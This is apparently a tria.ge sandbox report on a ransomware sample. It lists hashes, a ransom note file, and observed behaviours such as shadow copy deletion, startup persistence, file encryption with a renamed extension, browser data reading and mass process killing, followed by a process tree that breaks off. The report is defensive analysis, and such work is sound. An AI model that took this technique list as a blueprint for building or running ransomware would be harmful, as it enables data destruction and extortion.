Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04/05/2022, 19:29
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
sample.exe
Resource
win10v2004-20220414-en
General
-
Target
sample.exe
-
Size
1.1MB
-
MD5
a56644a519d6fce5f20a744ae3820af2
-
SHA1
93acd978da4a602c9ea1a23b6a97d74ced436e56
-
SHA256
563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
-
SHA512
5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416
Malware Config
Extracted
C:\Read_Me!_.txt
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\RenameEnable.tiff sample.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 7 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt sample.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Read_Me!_.txt sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Read_Me!_.txt sample.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe sample.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt sample.exe -
Loads dropped DLL 3 IoCs
pid Process 3164 Process not Found 3164 Process not Found 3164 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\desktop.ini sample.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini sample.exe File opened for modification C:\Users\Admin\Links\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini sample.exe File opened for modification C:\Users\Public\Videos\desktop.ini sample.exe File opened for modification C:\Users\Public\Documents\desktop.ini sample.exe File opened for modification C:\Users\Public\Music\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini sample.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini sample.exe File opened for modification C:\Users\Public\Downloads\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini sample.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini sample.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-3751123196-3323558407-1869646069-1000\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini sample.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini sample.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini sample.exe File opened for modification C:\Users\Admin\Music\desktop.ini sample.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini sample.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini sample.exe File opened for modification C:\Users\Public\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini sample.exe File opened for modification C:\Program Files (x86)\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini sample.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini sample.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini sample.exe File opened for modification C:\Program Files\desktop.ini sample.exe File opened for modification C:\Users\Admin\Searches\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini sample.exe File opened for modification C:\Users\Public\Desktop\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini sample.exe File opened for modification C:\Users\Public\Libraries\desktop.ini sample.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini sample.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini sample.exe File opened for modification C:\Users\Admin\Documents\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini sample.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: sample.exe File opened (read-only) \??\E: sample.exe File opened (read-only) \??\I: sample.exe File opened (read-only) \??\K: sample.exe File opened (read-only) \??\N: sample.exe File opened (read-only) \??\R: sample.exe File opened (read-only) \??\U: sample.exe File opened (read-only) \??\X: sample.exe File opened (read-only) \??\B: sample.exe File opened (read-only) \??\J: sample.exe File opened (read-only) \??\M: sample.exe File opened (read-only) \??\Q: sample.exe File opened (read-only) \??\S: sample.exe File opened (read-only) \??\V: sample.exe File opened (read-only) \??\W: sample.exe File opened (read-only) \??\Y: sample.exe File opened (read-only) \??\L: sample.exe File opened (read-only) \??\O: sample.exe File opened (read-only) \??\T: sample.exe File opened (read-only) \??\Z: sample.exe File opened (read-only) \??\A: sample.exe File opened (read-only) \??\F: sample.exe File opened (read-only) \??\G: sample.exe File opened (read-only) \??\H: sample.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496937509.profile.gz sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-RS\Read_Me!_.txt sample.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\loc_archives\en\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-200.png sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookSmallTile.scale-200.png sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-ul-oob.xrm-ms sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SyncFusion.Shared.Base.dll sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-125_contrast-white.png sample.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.157.61\msedgeupdateres_ug.dll sample.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Read_Me!_.txt sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-unplated.png sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-40_altform-unplated.png sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\office32ww.msi.16.x-none.vreg.dat sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_altform-unplated_contrast-white.png sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML[[email protected]].GFm2 sample.exe File opened for modification \??\c:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\LargeTile.scale-125.png sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\tilebg.png sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Shared.v11.1.dll sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-100.png sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\logo.png sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial2-pl.xrm-ms[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ui-strings.js sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png sample.exe File created C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\Read_Me!_.txt sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-125.png sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.157.61\msedgeupdateres_sr-Cyrl-RS.dll sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\core_icons.png[[email protected]].GFm2 sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSplashLogo.scale-400.png sample.exe File opened for modification \??\c:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-200.png sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200_contrast-black.png sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\Read_Me!_.txt sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ppd.xrm-ms sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-256.png sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeSmallTile.scale-400.png sample.exe File opened for modification \??\c:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-48_altform-unplated_devicefamily-colorfulunplated.png sample.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\deployed\jdk15\Read_Me!_.txt sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupWideTile.scale-100.png sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js[[email protected]].GFm2 sample.exe File created \??\c:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fa-IR\Read_Me!_.txt sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png sample.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\ui-strings.js sample.exe File opened for modification \??\c:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\TXP_CarReservation_Light.png sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Constantia-Franklin Gothic Book.xml sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp5-ul-phn.xrm-ms sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreLogo.png sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js[[email protected]].GFm2 sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENFR\Read_Me!_.txt sample.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Pagesfilo.sys sample.exe File opened for modification C:\Windows\Pagesfilo.sys sample.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4288 schtasks.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 5100 timeout.exe 4476 timeout.exe 2996 timeout.exe 2620 timeout.exe 3152 timeout.exe 1052 timeout.exe 3016 timeout.exe 4364 timeout.exe 2332 timeout.exe 1112 timeout.exe -
Enumerates processes with tasklist 1 TTPs 10 IoCs
pid Process 4900 tasklist.exe 1032 tasklist.exe 2308 tasklist.exe 1692 tasklist.exe 3668 tasklist.exe 2156 tasklist.exe 1560 tasklist.exe 1180 tasklist.exe 1080 tasklist.exe 2124 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 2064 systeminfo.exe 2484 systeminfo.exe -
Kills process with taskkill 40 IoCs
pid Process 2828 taskkill.exe 4348 taskkill.exe 4028 taskkill.exe 1996 taskkill.exe 3756 taskkill.exe 3040 taskkill.exe 4412 taskkill.exe 4344 taskkill.exe 1032 taskkill.exe 3160 taskkill.exe 3284 taskkill.exe 1068 taskkill.exe 924 taskkill.exe 1556 taskkill.exe 1112 taskkill.exe 3528 taskkill.exe 4272 taskkill.exe 2732 taskkill.exe 1200 taskkill.exe 3648 taskkill.exe 544 taskkill.exe 2980 taskkill.exe 3836 taskkill.exe 4360 taskkill.exe 4064 taskkill.exe 1380 taskkill.exe 2332 taskkill.exe 932 taskkill.exe 2836 taskkill.exe 3620 taskkill.exe 1456 taskkill.exe 3468 taskkill.exe 1232 taskkill.exe 4148 taskkill.exe 4660 taskkill.exe 1628 taskkill.exe 4984 taskkill.exe 1080 taskkill.exe 2608 taskkill.exe 2392 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2796 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1080 tasklist.exe 1080 tasklist.exe 1032 tasklist.exe 1032 tasklist.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1080 tasklist.exe Token: SeDebugPrivilege 1032 tasklist.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: 36 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: 36 1580 WMIC.exe Token: SeBackupPrivilege 4036 vssvc.exe Token: SeRestorePrivilege 4036 vssvc.exe Token: SeAuditPrivilege 4036 vssvc.exe Token: SeDebugPrivilege 2828 taskkill.exe Token: SeDebugPrivilege 4348 taskkill.exe Token: SeDebugPrivilege 3836 taskkill.exe Token: SeDebugPrivilege 4064 taskkill.exe Token: SeDebugPrivilege 4272 taskkill.exe Token: SeDebugPrivilege 4984 taskkill.exe Token: SeDebugPrivilege 2732 taskkill.exe Token: SeDebugPrivilege 4028 taskkill.exe Token: SeDebugPrivilege 1068 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 1200 taskkill.exe Token: SeDebugPrivilege 1380 taskkill.exe Token: SeDebugPrivilege 3648 taskkill.exe Token: SeDebugPrivilege 2332 taskkill.exe Token: SeDebugPrivilege 924 taskkill.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 544 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 964 wrote to memory of 3612 964 sample.exe 82 PID 964 wrote to memory of 3612 964 sample.exe 82 PID 964 wrote to memory of 3612 964 sample.exe 82 PID 3612 wrote to memory of 1080 3612 cmd.exe 84 PID 3612 wrote to memory of 1080 3612 cmd.exe 84 PID 3612 wrote to memory of 1080 3612 cmd.exe 84 PID 3612 wrote to memory of 620 3612 cmd.exe 83 PID 3612 wrote to memory of 620 3612 cmd.exe 83 PID 3612 wrote to memory of 620 3612 cmd.exe 83 PID 964 wrote to memory of 832 964 sample.exe 85 PID 964 wrote to memory of 832 964 sample.exe 85 PID 964 wrote to memory of 832 964 sample.exe 85 PID 964 wrote to memory of 2124 964 sample.exe 86 PID 964 wrote to memory of 2124 964 sample.exe 86 PID 964 wrote to memory of 2124 964 sample.exe 86 PID 2124 wrote to memory of 4832 2124 cmd.exe 87 PID 2124 wrote to memory of 4832 2124 cmd.exe 87 PID 2124 wrote to memory of 4832 2124 cmd.exe 87 PID 964 wrote to memory of 2728 964 sample.exe 88 PID 964 wrote to memory of 2728 964 sample.exe 88 PID 964 wrote to memory of 2728 964 sample.exe 88 PID 2728 wrote to memory of 4288 2728 cmd.exe 89 PID 2728 wrote to memory of 4288 2728 cmd.exe 89 PID 2728 wrote to memory of 4288 2728 cmd.exe 89 PID 4832 wrote to memory of 2952 4832 WScript.exe 90 PID 4832 wrote to memory of 2952 4832 WScript.exe 90 PID 4832 wrote to memory of 2952 4832 WScript.exe 90 PID 964 wrote to memory of 4408 964 sample.exe 92 PID 964 wrote to memory of 4408 964 sample.exe 92 PID 964 wrote to memory of 4408 964 sample.exe 92 PID 964 wrote to memory of 4772 964 sample.exe 93 PID 964 wrote to memory of 4772 964 sample.exe 93 PID 964 wrote to memory of 4772 964 sample.exe 93 PID 4772 wrote to memory of 2064 4772 cmd.exe 94 PID 4772 wrote to memory of 2064 4772 cmd.exe 94 PID 4772 wrote to memory of 2064 4772 cmd.exe 94 PID 4772 wrote to memory of 2344 4772 cmd.exe 95 PID 4772 wrote to memory of 2344 4772 cmd.exe 95 PID 4772 wrote to memory of 2344 4772 cmd.exe 95 PID 4832 wrote to memory of 4080 4832 WScript.exe 96 PID 4832 wrote to memory of 4080 4832 WScript.exe 96 PID 4832 wrote to memory of 4080 4832 WScript.exe 96 PID 4080 wrote to memory of 1032 4080 cmd.exe 98 PID 4080 wrote to memory of 1032 4080 cmd.exe 98 PID 4080 wrote to memory of 1032 4080 cmd.exe 98 PID 4080 wrote to memory of 4608 4080 cmd.exe 99 PID 4080 wrote to memory of 4608 4080 cmd.exe 99 PID 4080 wrote to memory of 4608 4080 cmd.exe 99 PID 4080 wrote to memory of 4476 4080 cmd.exe 100 PID 4080 wrote to memory of 4476 4080 cmd.exe 100 PID 4080 wrote to memory of 4476 4080 cmd.exe 100 PID 964 wrote to memory of 1980 964 sample.exe 102 PID 964 wrote to memory of 1980 964 sample.exe 102 PID 964 wrote to memory of 1980 964 sample.exe 102 PID 1980 wrote to memory of 2484 1980 cmd.exe 103 PID 1980 wrote to memory of 2484 1980 cmd.exe 103 PID 1980 wrote to memory of 2484 1980 cmd.exe 103 PID 1980 wrote to memory of 1408 1980 cmd.exe 104 PID 1980 wrote to memory of 1408 1980 cmd.exe 104 PID 1980 wrote to memory of 1408 1980 cmd.exe 104 PID 964 wrote to memory of 3396 964 sample.exe 105 PID 964 wrote to memory of 3396 964 sample.exe 105 PID 964 wrote to memory of 3396 964 sample.exe 105 PID 964 wrote to memory of 3868 964 sample.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:964 -
